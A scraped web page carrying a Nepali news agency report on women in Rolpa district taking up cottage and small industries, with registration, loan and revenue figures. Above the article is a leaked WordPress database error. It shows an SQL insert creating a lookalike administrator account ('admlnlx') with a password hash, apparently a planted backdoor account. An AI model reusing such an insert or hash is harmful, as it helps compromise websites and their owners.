WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/EwX2RNys4vMjbhQkL.ilStc0qwJi.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 06:13:15', '', 'admlnlx', 'admlnlx')
रोल्पा,माघ ५ –
यहाँका महिला घरेलु तथा साना उद्योगतर्फ आकर्षित हुँदै गएका छन् ।
घरेलु तथा साना उद्योग विकास समितिमा पछिल्ला दिनमा दर्ता भएका साना उद्योग अधिकांश महिलाद्वारा सञ्चालन गर्ने गरी दर्ता भएका उक्त कार्यालयका प्रमुख बालकृष्ण आचार्यले जानकारी दिनुभयो ।
जिल्लामा हाल फर्निचर, ग्रील, अल्लो कपडा, मह उत्पादन, सिलाइकटाई, बाख्रापालन, कुखुरापालन, झोला, बेकरी, होटल र कम्प्युटर प्रशिक्षणलगायत एक हजार तीन सय ६० वटा उद्योग दर्ता भएका छन् । असङ्गठित रुपमा थप दुई हजार बढी उद्योग सञ्चालन भइरहेका आचार्यको भनाइ छ ।
घरेलु उद्योगमा प्रायः घाटा बेहोर्नु नपरेका कारण महिला त्यसतर्फ आकर्षित हुँदै गएका हुन् । महिलालाई उद्यमतर्फ थप आकर्षण गर्न सरकारले बिना धितोमा रु एक लाखदेखि रु पाँच लाखसम्म ऋण उपलब्ध गराउँदै आएको आचार्यले बताउनुभयो । करिब २५ प्रतिशत उद्यमी वैदेशिक रोजगारीबाट फर्केकाहरु रहेका छन् ।
घरेलु तथा साना उद्योग विकास समिति तथा अन्य निकायबाट तालिम लिएका अधिकांशले रोजगारी पाएका कार्यालयले जनाएको छ । जिल्लामा चालु आवको ६ महिनामा रु ४० लाखभन्दा बढी राजस्व सङ्कलन भएको छ । – रासस